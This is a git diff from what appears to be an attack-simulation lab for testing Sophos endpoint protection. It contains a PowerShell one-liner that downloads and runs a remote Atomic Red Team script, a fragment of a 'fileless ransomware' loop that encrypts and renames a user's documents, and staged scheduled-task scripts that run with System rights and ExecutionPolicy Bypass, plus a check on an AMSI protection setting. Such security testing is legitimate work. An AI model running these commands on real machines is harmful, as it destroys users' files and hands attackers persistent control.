diff --git a/.DS_Store b/.DS_Store index 90aebef..1a4c007 100644 Binary files a/.DS_Store and b/.DS_Store differ diff --git a/atomicredteam b/atomicredteam index 4e081c2..910fb1d 100644 --- a/atomicredteam +++ b/atomicredteam @@ -3,4 +3,4 @@ Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser -Force; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicsfolder.ps1' -UseBasicParsing); Install-AtomicsFolder; -Invoke-AtomicTest All -Confirm:$false; +Invoke-AtomicTest All -Confirm:$false; \ No newline at end of file diff --git a/outlook.py b/backups/outlook.py similarity index 100% rename from outlook.py rename to backups/outlook.py diff --git a/scheduledtask b/backups/scheduledtask similarity index 100% rename from scheduledtask rename to backups/scheduledtask diff --git a/filelessransomware b/filelessransomware index 6966fba..0bc3ed6 100644 --- a/filelessransomware +++ b/filelessransomware @@ -12,4 +12,4 @@ return ,$fullData}; foreach($f in Get-ChildItem 'C:\Users\Sophos\Documents') {Get-Content -path $f.fullname -TotalCount 1; rename-item -path $f.fullname -newname ($f.fullname + '.0wnd'); [IO.File]::WriteAllBytes(($f.fullname + '.0wnd'), (Encrypt-String $key ([IO.File]::ReadAllBytes($f.fullname + '.0wnd')))); -start-sleep -s 4} +start-sleep -s 4} \ No newline at end of file diff --git a/poc-eap_watcher.ps1 b/poc-eap_watcher.ps1 new file mode 100644 index 0000000..6b626af --- /dev/null +++ b/poc-eap_watcher.ps1 @@ -0,0 +1,11 @@ +Function eapcheck { +$keyPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Management\Policy\ThreatProtection\*\amsi_protection" +$keyVal = "amsi_protection_block_on_detect" +$check = Get-ItemProperty -Path $keyPath | Select $keyVal +write-host $newCheck.$keyVal +if($check.$keyVal -eq 0) { +schtasks /delete /tn "POC EAP Watcher" /F +Restart-Computer -force +} +} +eapcheck \ No newline at end of file diff --git a/poc-stage2.ps1 b/poc-stage2.ps1 new file mode 100644 index 0000000..8732f8f --- /dev/null +++ b/poc-stage2.ps1 @@ -0,0 +1,4 @@ +schtasks /create /sc onlogon /tn "POC Stage 3" /tr "c:\threat\poc-stage3.bat" /ru Sophos /F +Start-Process c:\threat\SophosSetup.exe --quiet -Wait +schtasks /delete /tn "POC Stage 2" /F +schtasks /create /sc minute /mo 1 /tn "POC EAP Watcher" /tr "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass c:\threat\poc-eap_watcher.ps1" /ru System /F \ No newline at end of file diff --git a/poc-stage3.bat b/poc-stage3.bat new file mode 100644 index 0000000..877bdad --- /dev/null +++ b/poc-stage3.bat @@ -0,0 +1,4 @@ +start "" /B "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" +taskkill /im outlook.exe /f +"C:\Program Files\Python310\python.exe" -m pip install -r c:\threat\requirements.txt +"C:\Program Files\Python310\python.exe" c:\threat\{|vars.PythonStager|} \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index 5814718..263334d 100644 --- a/requirements.txt +++ b/requirements.txt @@ -10,4 +10,4 @@ pywinauto==0.6.8 pywinauto-recorder==0.5.0 six==1.16.0 uiautomation==2.0.16 -WMI==1.5.1 +WMI==1.5.1 \ No newline at end of file